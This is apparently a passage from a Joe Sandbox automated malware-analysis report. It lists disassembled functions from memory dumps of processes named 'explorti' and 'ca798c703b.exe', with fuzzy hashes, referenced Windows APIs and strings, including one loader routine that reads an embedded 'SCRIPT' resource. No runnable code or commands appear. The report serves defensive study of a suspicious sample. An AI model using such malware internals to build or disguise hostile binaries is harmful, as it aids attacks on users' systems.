Instruction Fuzzy Hash: 3C225FB3F515144BDB0CCA9DDCA27EDB2E3BFD8214B0E803DA40AE3745EA79D9158A44

Function 00176F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1163ee8a1424216ac9c242797f3471bf8d83b56315c37e9231dcc81783d9788
Instruction ID: 8b7d434b6f89404403175773539de25de1a8df356dd9a5a72536462a3cc74077
Opcode Fuzzy Hash: d1163ee8a1424216ac9c242797f3471bf8d83b56315c37e9231dcc81783d9788
Instruction Fuzzy Hash: 66B147312146099FD719CF28C496A657BB0FF45364F69C658E89ACF2E1C336E982CB40

Function 00134AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6941c02edb070b2765a24b46668c8e4c7e7a5116a1aea5129b1393600cf44ca
Instruction ID: e1fbb90f1d1c1a9760c2c483be516ccd509e877161515e4bf76fbeb1fff5b779
Opcode Fuzzy Hash: f6941c02edb070b2765a24b46668c8e4c7e7a5116a1aea5129b1393600cf44ca
Instruction Fuzzy Hash: 2251A1756087918FD319CF2D841523AFFE1BFD6200F084A9EE5E687252D774EA08CB91

Function 0017777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47e2ec0cb4e6eae36d1e343e8d84f2143a1a848faeae6937e51286be0470aa0f
Instruction ID: 8c3f98420e12514d45ad7acf148454da90e5cc9678755b65f93248c69d585f2f
Opcode Fuzzy Hash: 47e2ec0cb4e6eae36d1e343e8d84f2143a1a848faeae6937e51286be0470aa0f
Instruction Fuzzy Hash: 5D21B673F204394B770CC47ECC5727DB6E1C78C541745823AE8A6EA2C1D968D917E2E4

Function 0017765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e8ab1115a05e99de7c726e6d89a3fe3994f7f61aae2132adabdc18a919d9c89
Instruction ID: 4de6693c4874ea647e26be6c1a84d64c5bf7730c9845d36118888cb35c8bff90
Opcode Fuzzy Hash: 5e8ab1115a05e99de7c726e6d89a3fe3994f7f61aae2132adabdc18a919d9c89
Instruction Fuzzy Hash: 7B117723F30C255A775C816D8C1727AA5D2DBD825071F533AD826E72C4E994DE23D290

Function 00178720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: bb2f6c966750c026cc14796acb0280772f27b7a88c399173d56752c4480a7a16
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 2A11087B2C018147D60C862DC9FC5B6B7B6EBD5321B3DC37AD14B8B758DB229945D900

Function 0016645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9baf445dba436a79c7222fd096cb3017e136833f1e0a8202ca0e0843f9101c10
Instruction ID: 82ee5b4cee88d1f7c3b6b0a7948e64ec63c22e01b3f508d3630a92bbafb626ab
Opcode Fuzzy Hash: 9baf445dba436a79c7222fd096cb3017e136833f1e0a8202ca0e0843f9101c10
Instruction Fuzzy Hash: 20E0C2312426086FCF267B24CC08D483B5AEF21340F005414FC044A232CF35FDA2CE80

Function 0016A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 48939c093fe4ca0034ce383da33d2c82d8c1db73b323befeeef343c2b1818d91
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 85E0B672A15228EBCB15DB98994498AF2ACFB4AB50F554496B601E3251C370DF50CBD1

Function 00164770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001647A7
___except_validate_context_record.LIBVCRUNTIME ref: 001647AF
_ValidateLocalCookies.LIBCMT ref: 00164838
__IsNonwritableInCurrentImage.LIBCMT ref: 00164863
_ValidateLocalCookies.LIBCMT ref: 001648B8

Strings

csm, xrefs: 0016484D

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e060d7d1fc40562dd492b814e7df50175cb5d5b1cd124f134dc389b29e8d7674
Instruction ID: 71e58cd7323100aaf0a77d5995ab0f237732d686ac61bab59aaae9267bba6709
Opcode Fuzzy Hash: e060d7d1fc40562dd492b814e7df50175cb5d5b1cd124f134dc389b29e8d7674
Instruction Fuzzy Hash: E851D835A00248AFCF14DFA8CC85AAE7BBABF56314F148155E8149B352D732DE65CB90

Function 001670C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0016710B

Strings

.cmd, xrefs: 00167129
.com, xrefs: 0016714B
.exe, xrefs: 00167118
.bat, xrefs: 0016713A

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 132369422fd61a778a1e091d4272e0a61a92c326690c5a4915c634abc02ad314
Instruction ID: 8847c0d37cca8fa4a8ee8f7cc89d6cdff80b3361734fdbf8226ccf83b20f3b35
Opcode Fuzzy Hash: 132369422fd61a778a1e091d4272e0a61a92c326690c5a4915c634abc02ad314
Instruction Fuzzy Hash: AA01267760C212226619341C9C0263B17989F93BBC729002BFD44F73C2EF54DC624AA4

Function 00132E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00132F1F
__Mtx_unlock.LIBCPMT ref: 00132F8C
__Cnd_broadcast.LIBCPMT ref: 00132FA3
__Mtx_unlock.LIBCPMT ref: 001330B5
__Mtx_unlock.LIBCPMT ref: 0013315B

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: a7e01c38a371a2e7a394bba27f34d7ec747714932c5be0fa59d4eba408782552
Instruction ID: 417589ad77fbb942b05690ad4c3bb074a412d942cd03b0cb54bdc2ecd8e2f8af
Opcode Fuzzy Hash: a7e01c38a371a2e7a394bba27f34d7ec747714932c5be0fa59d4eba408782552
Instruction Fuzzy Hash: 80A1E3B1A01305EFDB15DF64C944BAAB7B8FF25324F048129E825DB251EB35EA04CBD1

Function 0016C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0016CA37

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: ea5776c568c8069163eb483c627bb763f7d20efb2423350771df76ecde9241c2
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 32B135329002859FDB15CF68CC91BBEBBE5EF55340F1581AAE889EB241D7349D51CBA0

Function 0014BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0014BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0014BB14
_xtime_get.LIBCPMT ref: 0014BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0014BB43

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: a76832952d44306ddc39e1ffaf9626aa3b01af720a80bb176318eaccb7c14c71
Instruction ID: 3a4e2c82ec55c1565e8d89104abfebb1244567e3c65457d47a1e7bd30fa8c2be
Opcode Fuzzy Hash: a76832952d44306ddc39e1ffaf9626aa3b01af720a80bb176318eaccb7c14c71
Instruction Fuzzy Hash: 62214C71A01209AFDF50EFA4DC819BEBBB9EF18714F100069F601B7261DB74AE418BA1

Analysis Process: ca798c703b.exePID: 2676, Parent PID: 6488COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.8%
Total number of Nodes:	1382
Total number of Limit Nodes:	40

Executed Functions

Function 007D42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 007D430D

Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A

GetCurrentProcess.KERNEL32(?,0086CB64,00000000,?,?), ref: 007D4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 007D4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 007D4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007D4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 007D4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 007D447B
GetSystemInfo.KERNEL32(?,?,?), ref: 007D44A0

Strings

kernel32.dll, xrefs: 007D444F
GetNativeSystemInfo, xrefs: 007D4460
|O, xrefs: 008136F8

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: ee3f4a6a926c8bf292596d7f0e9f2a3aae4329d8b9773f22be47a019df898c57
Instruction ID: a0bfde3303356c2782a714f7c07fb27f96d89510e44a877b3861aefe5fd81f6a
Opcode Fuzzy Hash: ee3f4a6a926c8bf292596d7f0e9f2a3aae4329d8b9773f22be47a019df898c57
Instruction Fuzzy Hash: 1AA1936590A2C0DFEF11CF69BC491E67FB8BB27340F1858AAD18197F61D67C4988CB21

Function 007D42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007D50AA,?,?,00000000,00000000), ref: 007D42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007D50AA,?,?,00000000,00000000), ref: 007D42C9
LoadResource.KERNEL32(?,00000000,?,?,007D50AA,?,?,00000000,00000000,?,?,?,?,?,?,007D4F20), ref: 008135BE
SizeofResource.KERNEL32(?,00000000,?,?,007D50AA,?,?,00000000,00000000,?,?,?,?,?,?,007D4F20), ref: 008135D3
LockResource.KERNEL32(007D50AA,?,?,007D50AA,?,?,00000000,00000000,?,?,?,?,?,?,007D4F20,?), ref: 008135E6

Strings

SCRIPT, xrefs: 007D42BF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
